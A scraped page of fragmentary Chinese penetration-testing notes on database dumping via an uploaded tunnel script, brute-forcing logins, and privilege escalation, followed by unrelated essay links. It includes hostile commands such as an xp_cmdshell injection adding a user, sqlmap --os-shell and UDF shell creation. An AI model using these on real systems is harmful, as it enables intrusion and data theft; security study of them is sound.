● 已有网站权限,上传拖库脚本进行拖库 ● 步骤 ● 连接数据库信息:库名、账号、密码、端口信息等 ● 填写导出信息:表、列、行数、保存路径等 ●
● 小巧且强大的拖库脚本 ● Navicat安装目录下:均使用【HTTP通道连接】,突破【不允许远程连接数据库】
● 【ntunnel_mysql.php】:MySQL ● 【ntunnel_pgsql.php】:PostgreSql ● 【ntunnel_sqlite.php】:SQLite ● 使用方法:
● 上传拖库脚本(ntunnel_mysql.php改名位 db.php)到网站的可访问目录(如根目录)
● 打开 Navicat,新建连接→mysql,选择【HTTP选项卡】,勾选使用 HTTP通道,在通道栏写入上传的脚本的 URL http://www.xxx.com/db.php,其他保持默认即可 ● 返回【常规选项卡】,填写连接名、用户名以及密码。注意:要连接的主机 IP地址应该为“Localhost”或“127.0.0.1”,代表本地连接。填写完后就可以连接到 Mysql 数据库 ● 综合篇
● 暴力破解测试
● C/S 架构破解
● SQL Server ● 爆破工具:Nmap、X-scan、Hydra、CrackDB等 ● Hydra支持破解的服务:FTP、MSSQL、MySQL、POP3、SSH 等 ● 语法:
● 示例:未指定文件路径,Hydra将在本目录下查找文件
● 爆破成功后,拖库+提权 ● SQLMap连接,反弹一个与系统交互的 Shell来提权 ● 【sqlmap -d "mssql://user:pwd@192.168.1.110:1433/master" --os-shell】
● 对多台服务器同时探测弱口令,撒网式攻击,批量入侵服务器的一种方式 ● MySQL ● Hydra略 ● Medusa:迅速、大规模并行、模块化的暴力破解程序 ● 特点:
● 基本使用方法:
● 【medusa -d】查看可以利用的模块 ● 【medusa -M mysql -q】查看指定模块的帮助信息,以 mysql为例 ● 【普通猜解】【mysql hash】
● 语法:
● h|H
u|U
p|P
C
M
OPT
● 常用参数以及说明
● 示例:-h -u -P -M mysql
● 其他示例:
● B/S 架构破解
● WordPress为例,暴力破解 B/S 架构的 Web Form ● 用户名可参考文章作者 ● Hydra、Medusa也都支持表单破解 ● BurpSuite ● 先寻找一个标志位,登录成功与失败的区别点
● 爆破步骤 ● 1、获取设置循环变量 ●
● 2、设置 Payload ● 3、设置标识位 ●
● 4、寻找破解后的密码 ●
● 专用扫描工具:WpScan ● 暴力破解案例
● 攻击 OA 系统 ● 搜集用户名等信息 ● 邮箱
● 错误信息提示
● 破解验证码 ● 较长时间内有效,则有可能会被爆破
●
● 防止暴力破解
● 密码的复杂性 ● 密码策略
● 验证码措施 ●
● 登陆日志(限制登录次数)
●
● 旁注攻击
● 概述
● 端 服务器端 Web 架构
● 一个服务器可能存在多个网站或多个数据库,寻找薄弱点进行攻击,数据库、提权等危害
● 子域名
● IP 逆向查询
● 【网站】到 【IP 】再到【该 IP 部署的所有网站】
● IP反查网站:
● http://tool.chinaz.com/Same/ ● http://dns.aizhan.com ● http://www.114best.com/ip/ ● 调用过了必应搜索引擎的接口(也有很多其他接口)来抓取
● 旁注查询软件 ● SQL 跨库查询
● 权限最小原则
● 目录越权
● 配置不当
● 构造注入点
● 根据相应的脚本来构造一个注入点
● 各脚本注入点 ● aspx 版本:连接数据库,并查询 id 数据,用户输入参数 id 没有任何过滤直接拼接在字符串中
● PHP
● JSP
● 数据库账户信息,SQLMap,权限够高就可以将 Shell数据备份到指定目录,甚至提权等。
● CDN
● 内容分发网络:尽可能地避开互联网上有可能影响数据传输速度和稳定性的瓶颈、环节,使内容的传输速度更快、更稳定 ● 服务器使用 CDN 后,真实 IP 将会隐藏起来 ● 使用场景:
● 使用 CDN 的效果
● CDN (加速)原理:将源服务器上可以缓存的文件(静态文件、图片、JS、CSS等)下载到缓存服务器,当用户访问你得域名时,将会访问缓存服务器,而不是直接去访问源服务器 ● 示例:
● java 判断 CDN
● 安全宝、加速乐等都提供了免费的 CDN供用户使用。
● CDN 缺点:攻击者可以直接攻击 CDN节点造成网站无法访问的现象 ● 搜集真实 IP 的方法 ● phpinfo()
● 子域名:仅对主站做了 CDN,子域名和主站存放在一台服务器中
● 观察 IP 变化
● 小结:
● 提权
● 一般分类:溢出提权、第三方组件提权 ● 溢出提权
● 远程(少),本地(主)
● 方法 ● linux ● uname -a 内核版本,找对应版本的提权脚本
● 反弹 shell(回显、交互、便利等好处)
● 上传本地溢出 EXP 并执行,得到 root shell ● windows ● 探测脚本信息 ● 执行权限:
● 【ASP】需要【wscript.shell】命令执行组件 ● 【ASP.NET】依靠【.NET Framework】
● 【JSP】依靠【JVM】调用系统命令
● 执行简单的系统命令 ● 可能存在禁用 cmd.exe,但提权 EXP可执行即可。
● 上传.aspx的 shell来执行命令
● 常见 CMD参数如下:
● 关键在于执行权限
● 第三方组件提权
如:.NET framework、PcAnywhere、MySQL、SQL Server等 ● 信息搜集 ● 服务器支持的 脚本语言 ● 服务器 端口探测 ● 目的:探测服务、软件,针对特定服务或软件提权 ● 方式:
● 本地扫描:webshell ● 远程扫描:nmap -A -p- ● 执行系统命令查看(最准确):netstat -an ● 搜集 路径信息 ● 可访问的路径、软件的安装路径等 ● 注册表:如【HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\】
● 数据库提权 ● 成功率高 ● SQL Server ● SQl Server 提权主要依据一个特殊的存储过程:xp_cmdshell ,他可以调用系统命令:如【net user x x /add & net localgroup administrator x /add 】
● 条件:只有 sysadmin 权限可以使用”xp_cmdshell“ ● xp_cmdshell关闭的报错、开启 ● 报错
● 开启 ● 注意:不是 SA 账户,只要有 sysadmin权限就可以使用 xp_cmdshell提权
● SQL Server 提权:注入点 和 得到数据库账户信息 ● 注入点 ● 【id=1; exec master..xp_cmdshell "net user 1 1 /add"--】
● 【sqlmap -u --os-cmd="net user"】
● 得到数据库账户信息 ● 得到 SA 的账密,外(远程)连接 或 本地连接 提权 ● 账户信息一般可以在脚本文件中找到:
● conn.asp ● web.config ● db.inc等文件 ● 工具 ● 菜刀的数据库连接和管理
● 其他提权方式:sqlserveragent、sp_oacreate、xp_regwrite ● MySQL ● 自定义函数 提权 ● UDF(User defined Function)提权
● 自动化软件、提权脚本 ● SQLMap也存在 UDF 可以使用对 Mysql提权 ● 一个简单的 MySQL 自动化提权脚本 ● 连接数据库
● MySQL 安装路径中的 root用户密码:/data/mysql/user.MYD,此文件保存着数据库中的所有账户信息 ● 导出 UDF ● 执行命令 ● 其他方法:写文件到启动项等
● create function cmdshell returns string soname "udf.dll" ● select cmdshell("command"); ● FTP 提权 ● 简介 ●
● 成因,以及利用 ●
● Serv-U 提权 ● 根据版本寻找提权漏洞以及利用方法,Serv-U 配置文件 ServUAdmin.exe 16 进制打开配置文件,可获得默认账密
● 修改配置文件,Serv-U 安装目录下“ServUDaemon.ini”配置文件,保存了所有的 FTP账户信息
● 可以手工添加一个 FTP账户,让其拥有足够的权限
● Gene6 FTP 提权 同 Serv-U 一样也是一款搭建 FTP环境的软件 ● 配置文件:安装目录/RemoteAdmin/Remote.ini,即远程管理账户信息
● Password:MD5 加密后的密码,默认 MD5,也可以明文、SHA1、MD5 加随机数的加密形式展现
● 解密后得知管理员的账密,远程连接(因为 G6 FTP默认不允许远程连接,需要LXC进行端口转发)并提权 ● 服务器端:lcx.exe -tran 1234 127.0.0.1 8021
● 连接成功后"域→任意域→用户",新建 FTP用户,根据提示输入新的 FTP账户、密码以及用户主目录信息后,在弹出的新界面中选择“访问权限”
● 上传新建用户并提权的 BAT,执行,验证
● 关键就是【端口转发】+【FTP执行 BAT文件】
● FileZilla 提权 ● 概述:14147,【FileZillaServer interface.xml】:管理员信息;【FileZilla Server.xml】:用户信息
● 【FileZillaServer interface.xml】
● 【FileZilla Server.xml】
● 具体步骤:sethc.exe,也就是 粘滞键漏洞,远程桌面触发进行提权即可
● FlashFXP 提权 ●
● PcAnywhere 提权 ● 远程控制软件(相同的软件很多,如 TeamView)。服务器安装被控端,主控端才能控制服务器 ● 连接流程:服务器端配置连接信息,客户端连接即可
● PcAnywhere提权:配置文件密码破解。
● 总结
● 虚拟主机提权
● 简介
● 0day提权
● 提权辅助
● 3389 端口(RDB)
)
● 开启:我的电脑,属性,远程,启用,3389 就会打开 ● 默认只允许管理员远程登录,其他需要授权
● Windows自带了远程桌面连接工具:cmd 下 mstsc,system32 目录下的 mstsc.exe,启动后可以图形化管理 ● 攻击者 shell环境 下开启 3389 ● 以下存为.bat,运行即可开启 3389
● 针对 3389暴力破解也可以 ● 面对批量化攻击,改端口或者强密码 ● 获取 rdb服务端口:nmap、cmdshell下的 netstat -an、专...
- 范文大全
- 职场知识
- 精美散文
- 名著
- 讲坛
- 诗歌
- 礼仪知识
-
超星尔雅学习通《对话大国工匠致敬劳动模范》题库附答案
超星尔雅学习通《对话大国工匠致敬劳动模范》题库附答案 1、历史只会眷顾坚定者、奋进者、搏击者,而不会
【入党申请书】 日期:2021-05-12
-
对于政治生态考核整改工作方案
本文系作者原创投稿,仅供学习参考,请勿照搬照抄! 关于政治生态考核整改工作的方案 为做好推进风清气正
【经济工作】 日期:2020-06-05
-
大学生学习2024年两会精神心得感悟
大学生学习2024年两会精神心得感悟过去一年,是全面贯彻二十大精神的开局之年,中国共产党带领全国各族人民,付出艰辛努力,换来重大成
【心得体会】 日期:2024-03-07
-
中国传统故事英文版 中国古代故事英文版
历史学科蕴含着许多丰富的、生动的、有趣的素材,每一个历史事件、历史人物都有相关的、动人的历史小故事,都能给人以启迪。你对中国古代的故事了解多少呢?下面是小编为您...
【调查报告】 日期:2019-05-22
-
基尔霍夫定律验证实验报告
基尔霍夫定律的验证的实验报告本文关键词:基尔,定律,霍夫,验证,实验基尔霍夫定律的验证的实验报告本文
【思想宣传】 日期:2021-03-08
-
中小学党建工作实施意见
中小学党建设工作实施意见中小学校担负着培养德智体美全面发展的社会主义建设者和接班人的重要使命。加强中
【爱国演讲】 日期:2020-09-22
-
地藏经诵读仪规(完整版)
地藏经诵读仪规(完整版) 恭请文: 恭请大慈大悲大愿地藏王菩萨、护法诸天菩萨慈悲加持护念弟子***能
【个人简历】 日期:2021-03-31
-
青年学生学习全国人大十四届二次会议心得感想16篇
青年学生学习全国人大十四届二次会议心得感想16篇报告中提到政府在经济调控、消费政策、基础设施和制造业投资、房地产调控以及地方债务
【心得体会】 日期:2024-03-07
-
材料力学考题
材料力学考题本文关键词:材料力学,考题材料力学考题本文简介:材料力学1、简易起重设备中,AC杆由两根
【入党申请书】 日期:2021-03-06
-
2022读懂中国五老事迹征文5篇
2022读懂中国五老事迹征文5篇 放军经过两天的拼搏,到了马垅都筋疲力尽,马垅村的村民纷纷拿出自家的伙食到榕树下给解放军们食用,
【征文演讲】 日期:2022-07-07
-
执行信息公开网
执行信息公开网 执行信息公开网 执行信息公开网: zhi*ing (点击下图可直接进行访问) 全国
【职场知识】 日期:2020-07-03
-
年国家开放大学电大电子商务单选题题库
单选: 1、EDI是指A、电子商务B、电子数据交换C、电子交易 D、移动数据交换 答案: B 2、电
【职场知识】 日期:2020-06-05
-
有机磷酸酯类中毒及其解救(实验报告范文)
有机磷酸酯类中毒及其解救XXX、XXX一、实验目的1 观察有机磷酸酯类农药敌百虫中毒时的症状。 2
【职场知识】 日期:2020-08-30
-
“以学生为中心”的教学原则
以学生为中心的教学原则教师在开展以学生为中心的教学实践中,必须谨记学习目标不再是知识的获得,能力要比知识更重要。以下是蒲公英阅读网
【职场知识】 日期:2023-01-05
-
大学教师毕业设计指导记录4篇
大学教师毕业设计指导记录4篇 毕业设计是指工、农、林科高等学校和中等专业学校学生毕业前夕总结性的独立作业。是实践性教学最后一
【职场知识】 日期:2022-05-11
-
2021教育基础知识试题(附答案)
2021教育基础知识精选试题(附答案) 1、主张恢复西方传统教育核心价值,反对“进步教育
【职场知识】 日期:2021-03-17
-
男一分钟仰卧起坐标准表
表表11--13 男生一分钟仰卧起坐、引体向上单项评分表(单位:次) 等级 单项 得分 三年级 四年
【职场知识】 日期:2021-05-08
-
“从青风公司审计案例看销售与收款循环审计”案例说明书
“从青风公司审计案例看销售与收款循环审计”案例说明书一、本案例要解决的关键问
【职场知识】 日期:2020-09-28
-
机械加工创业项目_加工小本创业项目
现在在加工创业项目办小本加工厂有哪些?有什么项目推荐,下面这些小本加工厂项目个个都适合一个人创业,来看看吧!以下是小编分享给大家的关于,一起来看看加工小本创业项目吧!...
【职场知识】 日期:2020-03-19
-
发展党员工作部门联审征求意见表
发展党员工作部门联审征求意见表发展对象姓 名 性别 出生年月 身份证号 现工作单位及职务 家庭住址
【职场知识】 日期:2020-09-22
-
唐代诗人李昂个人信息
唐代诗人李昂个人信息 导读:我根据大家的需要整理了一份关于《唐代诗人李昂个人信息》的内容,具体内容:
【古典文学】 日期:2020-11-07
-
[关于中秋的朗诵诗词] 关于爱国的朗诵诗词
中秋,热闹的街头树起了灯彩,舞起了火龙。你知道多少关于中秋的朗诵诗词?下面小编为你整理了几篇关于中秋的朗诵诗词,希望对你有帮助。 关于中秋的朗诵诗词一 中秋佳节...
【古典文学】 日期:2019-06-06
-
叠加原理实验报告
一、实验目的1、通过实验来验证线性电路中的叠加原理以及其适用范围。 2、学习直流仪器仪表的测试方法。
【古典文学】 日期:2020-11-12
-
大气唯美黑板报【国庆节大气黑板报】
日本在投降的那一天,再也没有昔日的嚣张,我们中国的屈辱得到洗刷。下面就随小编看看国庆节大气黑板报内容,希望喜欢哦。 国庆节大气黑板报图片欣赏 国庆节大气黑板报...
【古典文学】 日期:2019-05-05
-
怎样认识世界处于百年未有之大变局
怎样认识世界处于百年未有之大变局 首先,“大变局”是对国际格局发生巨大变迁的
【古典文学】 日期:2020-10-28
-
输血查对制度
输血查对制度依据卫生部《临床输血技术规范》的要求,制订抽血交叉配备查对制度、取血查对制度、输血查对制
【古典文学】 日期:2020-09-24
-
【二人旅游英语情景对话】 二人英语对话2分钟旅游
随着国内外旅游业市场的不断扩大,旅游英语人才成为社会的紧缺人才。小编精心收集了二人旅游英语情景对话,供大家欣赏学习! 二人旅游英语情景对话1 A:Itsmyfirsttimeto...
【古典文学】 日期:2020-02-29
-
法律知识手抄报图片大全|法律知识手抄报
我国开展了全面的普法宣传工作,法制宣传教育、普及法律常识作为经常的重要任务。做法制教育手抄报,普及法律知识。下面是小编为大家带来的法律知识手抄报图片大全,希望大家...
【古典文学】 日期:2020-03-10
-
2021公安专业知识考试练习题(附答案)
2021公安专业知识考试练习题(附答案) 1 甲地公安机关接到群众举报,在当天举行的大型娱乐活动中,
【古典文学】 日期:2021-01-29
-
乳糖检测方法
附录A(规范性附录) 乳糖的测定A 1原理牛乳或乳粉样液经沉淀剂澄清后,样液中的乳糖在苯酚、氢氧化钠
【古典文学】 日期:2020-12-08
-
时尚女装店面装修效果图|韩式女装店面装修
在服装店的设计之中,我们要将多变、创新、品牌自身的定位与发展趋势相结合,用一种可持续的设计方式呈现出来,以便更加适应不断更新的展示主体。下面小编就为大家解开时尚女装店...
【中国文学】 日期:2019-05-16
-
2021年超星尔雅学习通《辩论与修养》章节测试试题(共183题附答案)
2021年超星尔雅学习通《辩论与修养》章节测试试题(共183题附答案)1、辩论的目的不是单纯获得某种
【中国文学】 日期:2021-05-12
-
【世界上最大的半岛】阿拉伯半岛
你知道世界上最大的半岛是什么吗?下面由小编来介绍一下。 阿拉伯半岛的简介 阿拉伯半岛(阿拉伯文:)位于亚洲,是世界上最大的半岛。沙特阿拉伯、也门、阿曼、阿拉伯联合...
【中国文学】 日期:2019-05-24
-
信息技术重要性
信息技术的重要性 信息技术与课程整合将带来课程内容的革新,信息技术的高速发展,要求传统的课程必须适应
【中国文学】 日期:2021-02-11
-
天地人格最佳搭配起名技巧|天地人格的五行怎么算
天地有阴有阳,物体刚柔表里,而数字则有一个诱导力,那么你知道怎么计算天地人格来取名吗?今天小编为你整理了天地人格最佳搭配起名技巧,一起来看看用天地人格取名的方法有哪些...
【中国文学】 日期:2019-06-06
-
雪天安全行车注意事项_雪天安全行车提示语
维护城市交通秩序,争做河源文明市民。你们想看看雪天安全行车提示语有哪些吗?以下是小编推荐雪天安全行车提示语给大家,欢迎大家阅读! 安全行车温馨提示语【经典篇】 1...
【中国文学】 日期:2020-03-15
-
2022年当前世界下中国面临国际形势论文范本
和平与发展仍然是当今时代的主题。谋和平、求合作、促发展是各国人民的共同愿望。为了大家学习方便,下面是小编为大家整理的当前世界下中国面临的国际形势论文范文内容,以供参...
【中国文学】 日期:2022-03-31
-
古代人物漫画女生唯美图片欣赏 漫画人物图片女孩唯美
中国漫画始于清末民初,而平面设计虽然其名称是在改革开放以后确立的,但设计活动却自古就有,二者的相互影响是本文的主要讨论范围。小编整理了唯美古代女生人物漫画,欢迎阅读!...
【中国文学】 日期:2020-03-19
-
小数乘法计算方法
小数乘法得计算方法理解小数乘法计算得法则,能够比较熟练得进行小数乘法笔算与简单得口算重点掌握小数乘法
【中国文学】 日期:2020-12-22
-
爱情的英语作文|关于爱情的英语作文
爱情的英语作文,书写了世界上伟大的爱情。下面是小编给大家整理的爱情的英语作文的相关知识,供大家参阅! 爱情的英语作文篇1 Loveisthemostbeautifulthingintheworld,i...
【中国文学】 日期:2020-03-10
-
山东省生产经营单位安全生产主体责任规定(303号令)
山东省生产经营单位安全生产主体责任规定(2013年2月2日山东省人民政府令第260号公布根据2016
【外国名著】 日期:2020-10-22
-
改革开放大事记简表(改革开放新时期1978-2012年)
改革开放大事记简表 (1978-2012年) 时间1978年12月18日至22日地点北京事件党的十一
【外国名著】 日期:2021-06-17
-
大学生音乐欣赏论文 大学音乐鉴赏论文3000
今天小编就为你介绍关于大学生音乐欣赏论文,下面是!小编给你搜集了相关资料!希望可以能帮助到大家。 大学生音乐欣赏论文—第一篇 音乐是生活不可缺少的一部分,学会欣...
【外国名著】 日期:2019-05-27
-
材料力学金属扭转实验报告
材料力学金属扭转实验报告 【实验目的】 1、验证扭转变形公式,测定低碳钢的切变模量G。;测定低碳钢和
【外国名著】 日期:2020-11-27
-
长豆角家常做法怎么做好吃营养 炒豆角的家常做法
豆角在我们日常生活中是很常见的食材,可能我们只知道它含有优质蛋白和维生素,其实它还有其他的营养价值。它也是可以和很多食材做搭配的。下面小编为大家整理了长豆角的做法...
【外国名著】 日期:2020-02-26
-
坚定不移全面从严管党治警研讨发言稿
坚定不移全面从严管党治警研讨发言稿政治建警、从严治警是党在新时代的建警治警方针。一年前的全国公安工作
【外国名著】 日期:2020-09-18
-
植物装饰画黑白图片欣赏|荷花装饰画黑白图片
装饰画是一种装饰性艺术,是装饰性和创造性相结合的艺术设计形式。小编整理了植物装饰画黑白,欢迎阅读! 植物装饰画黑白图片展示 植物装饰画黑白图片1 植物装饰画黑白...
【外国名著】 日期:2019-05-31
-
白烛葵的花语:白烛葵的不死幻想症
白烛葵,花名,花语为“不感兴趣”。现又指《知音漫客》上连载漫画《极度分裂》里主要角色之一。下面小编为你整理了白烛葵的花语。欢迎阅读。 白烛葵的花语:不感兴趣 ...
【外国名著】 日期:2019-05-11
-
(新版)就业知识竞赛题库及答案解析
(新版)就业知识竞赛题库(全真题库) 一、单选题1 (单选):在职业生涯规划工具中,组织在展开员工职
【外国名著】 日期:2021-07-21
-
[10.1旅游去哪里好玩] 旅游去哪里好玩
十月一到,秋意已在一个我们不经意的黎明走来,习习凉风,却是最适合出门游行。小编为您整理了10 1旅游去哪里好玩,秋天,我们一起出发吧。 1、云南建水古城 建水古城...
【外国名著】 日期:2020-03-01
-
梧桐花的花语|梧桐花的功效与作用
梧桐花为梧桐科植物梧桐的花,植物形态详梧桐子条。今天小编为你整理了梧桐花的花语,欢迎阅读。 梧桐花的花语是:情窦初开 在春季里晚开的花朵,有着恬淡的气息。 ...
【寓言童话】 日期:2020-03-03
-
西部计划笔试题库(99题含答案)
西部计划笔试题库(99题含答案) 1 第十三届全国人大三次会议表决通过了《中华人民共和国民法典》,自
【寓言童话】 日期:2021-06-16
-
大学生音乐欣赏论文 大学音乐鉴赏论文3000
今天小编就为你介绍关于大学生音乐欣赏论文,下面是!小编给你搜集了相关资料!希望可以能帮助到大家。 大学生音乐欣赏论文—第一篇 音乐是生活不可缺少的一部分,学会欣...
【寓言童话】 日期:2020-03-12
-
年学生资助诚信教育主题活动方案
各二级学院(部): 为深入贯彻落实习近平总书记关于教育的重要论述,落实立德树人根本任务,增强当代大学
【寓言童话】 日期:2020-06-21
-
主题教育调查研究工作方案2篇
主题教育调查研究工作方案1根据省、市、县开展“不忘初心、牢记使命”主题教育工
【寓言童话】 日期:2021-03-19
-
油管、套管规格尺寸对照表
API油管规格及尺寸 公称尺寸(in) 不加厚外径(mm) 不加厚内径(mm) 加厚外径(mm) 加
【寓言童话】 日期:2020-08-31
-
惊悚鬼故事50字 令人惊悚的故事
这些惊悚故事在短短的篇幅和时间之内让您感受到故事里传达出来的恐怖感,令你感到害怕。下面就是小编给大家整理的令人惊悚的故事,希望对你有用! 令人惊悚的故事篇1:学校...
【寓言童话】 日期:2019-05-13
-
北京最好吃的自助餐厅 北京高档自助餐排名
自助餐简直就是拯救大胃王的最佳饮食!没有之一!世界上没有什么事情是吃一顿自助餐解决不了的,如果有,那就吃两顿!下面小编给大家推荐北京几家好吃的自助餐。 北京最好吃的...
【寓言童话】 日期:2020-02-25
-
【古代男生漫画图片大全】男生漫画头像
漫画和动画组成了动漫产业的两大支柱。然而,与动画相比,漫画在业界和学界皆相对冷清。小编整理了古代男生漫画,欢迎阅读! 古代男生漫画图片展示 古代男生漫画图片1 ...
【寓言童话】 日期:2019-05-27
-
廉洁自律自我剖析材料(精选)
廉洁自律自我剖析材料((精选多篇)) 信念。科学文化,提高自身素质的终身学习的意识,紧密联系群众,调
【寓言童话】 日期:2020-07-20
-
学生高考动员演讲稿
学生高考动员演讲稿3篇高考动员演讲稿11 老师们、同学们: 大家下午好!漫漫高考长征路已经进入尾声了
【百家讲坛】 日期:2021-09-22
-
企业安全演讲稿2021
最新企业安全的演讲稿5篇 演讲稿是作为在特定的情境中供口语表达使用的文稿。在充满活力,日益开放的今天
【百家讲坛】 日期:2021-09-22
-
XX镇扶贫项目实施专项整治工作总结_1
XX镇扶贫项目实施专项整治工作总结 为深入贯彻精准扶贫精准脱贫基本方略,认真落实党中央、国务院,省委
【百家讲坛】 日期:2021-09-22
-
对乡镇领导班子干部成员批评意见例文
对乡镇领导班子干部成员的批评看法范文 一、对党委书记XXX同志的批评看法〔3条〕 1、与干部交流偏少
【百家讲坛】 日期:2021-09-22
-
群英乡扶贫资金项目芬坡村祖埇村生产道路硬化工程绩效自评报告
群英乡扶贫资金项目((芬坡村祖埇村生产道路硬化工程))绩效自评报告 一、基本情况(一)群英乡扶贫资金
【百家讲坛】 日期:2021-09-22
-
党委书记警示教育大会上讲话2021汇编
党委书记在警示教育大会上的讲话55篇汇编 党委书记在警示教育大会上的讲话(一) 同志们: 根据省州委
【百家讲坛】 日期:2021-09-22
-
对于2021年召开巡视整改专题民主生活会对照检查材料
关于12021年召开巡视整改专题民主生活会对照检查材料 按照中央巡视组要求和省、市、区委统一部署,区
【百家讲坛】 日期:2021-08-14
-
消防安全知识培训试题.doc
消防安全知识培训试题姓名: 部门班组: 成绩: 一:填空题,每空4分,共44分。 1、灭火剂是通过隔
【百家讲坛】 日期:2021-08-14
-
涉疫重点人员“五包一”居家隔离医学观察工作流程
涉疫重点人员“五包一”居家隔离医学观察工作流程 目前,全球疫情仍处于大流行状
【百家讲坛】 日期:2021-08-14
-
疫情防控致全体师生员工及家长一封信
疫情防控致全体师生员工及家长的一封信 各位师生员工及全体家长朋友: 暑假已至,近期我省部分地方发现确
【百家讲坛】 日期:2021-08-14